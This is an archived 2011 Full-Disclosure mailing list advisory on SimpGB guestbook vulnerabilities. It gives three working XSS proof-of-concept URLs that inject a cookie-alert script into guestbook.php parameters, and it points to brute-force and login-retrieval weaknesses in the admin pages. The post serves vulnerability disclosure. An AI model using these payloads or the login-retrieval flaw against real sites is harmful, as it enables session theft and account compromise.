[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Multiple vulnerabilities in SimpGB

To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Multiple vulnerabilities in SimpGB
From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
Date: Wed, 26 Jan 2011 16:15:37 +0200

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

Vulnerable are SimpGB v1.49.02 and previous versions.

----------
Details:
----------

XSS (WASC-08):

POST request at page http://site/guestbook.php in parameters poster,
postingid and location in Preview function. If captcha is using in
guestbook, then working code of the captcha is required for the attack. Or
via GET request:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection from automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
  - From: laurent gaffie

Prev by Date: Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml
Next by Date: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
Previous by thread: [Full-disclosure] Updated Dll Hijack Auditor v2.5 - Little Smart Tool to Audit against 'Dll Hijack Vulnerability'
Next by thread: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
Index(es):
- Date
- Thread